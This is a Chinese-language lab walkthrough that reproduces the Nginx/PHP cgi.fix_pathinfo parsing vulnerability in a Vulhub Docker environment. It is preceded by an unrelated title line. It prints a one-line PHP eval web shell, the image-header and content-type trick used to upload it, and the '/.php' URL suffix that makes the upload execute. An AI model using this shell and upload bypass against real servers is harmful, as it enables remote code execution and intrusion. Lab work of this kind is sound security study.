网站建设合同附件wordpress 栏目排版
Nginx 背锅解析漏洞
文章目录
- Nginx 背锅解析漏洞
 - 1 在线漏洞解读:
 - 2 环境搭建
 - 3 影响版本:
 - 4 漏洞复现
 - 4.1 访问页面
 - 4.2 上传文件
 
- 4.3 上传失败
 - 4.4 使用bp进行分析包
 - 4.5 对返回图片位置进行访问
 - 4.6 执行php代码技巧-图片后缀加`./php`
 - 4.7 分析原因 --》cgi.fix_pathinfo--》on开启后会将png图当成php脚本执行
 
1 在线漏洞解读:
https://vulhub.org/#/environments/nginx/nginx_parsing_vulnerability/
 

2 环境搭建
cd  /home/kali/vulhub/nginx/nginx_parsing_vulnerability
 

启动:
sudo docker-compose up -dsudo docker-compose ps -a
sudo docker ps -a
 
已启动:访问端口18080

3 影响版本:
 版本信息:
- Nginx 1.x 最新版
 - PHP 7.x最新版
 
4 漏洞复现
4.1 访问页面
 访问页面http://192.168.225.166:18080/

4.2 上传文件
<?php @eval($_REQUEST[777]);phpinfo();?>  # 1.php文件内容
 

4.3 上传失败

4.4 使用bp进行分析包
使用bp修改请求参数后缀和内容类型,和内容头类型,发现上传成功,返回上传文件位置
Content-Type: image/pngGIF89A
 

4.5 对返回图片位置进行访问
192.168.225.166:18080/uploadfiles/4a47a0db6e60853dedfcfdf08a5ca249.png
 

4.6 执行php代码技巧-图片后缀加./php
 
http://192.168.225.166:18080/uploadfiles/4a47a0db6e60853dedfcfdf08a5ca249.png/.php
 

4.7 分析原因 --》cgi.fix_pathinfo–》on开启后会将png图当成php脚本执行

